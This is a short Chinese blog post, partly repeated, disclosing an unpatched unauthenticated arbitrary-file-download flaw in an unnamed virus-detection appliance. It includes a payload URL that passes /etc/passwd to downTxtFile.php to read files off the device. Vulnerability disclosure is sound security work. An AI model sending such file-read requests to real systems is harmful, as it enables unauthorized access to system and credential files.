某安全设备未授权访问+任意文件下载0day
具体是哪家就不说了,硬件盒子,主要检测病毒。
payload如下:
https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd
比较简单,当时有获取报告的功能,自己传入的物理路径,可以未授权访问直接下载设备上的文件。
【版权所有@Sevck 博客地址http://www.cnblogs.com/sevck】 可以转载,注明出处.
具体是哪家就不说了,硬件盒子,主要检测病毒。
payload如下:
https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd
比较简单,当时有获取报告的功能,自己传入的物理路径,可以未授权访问直接下载设备上的文件。
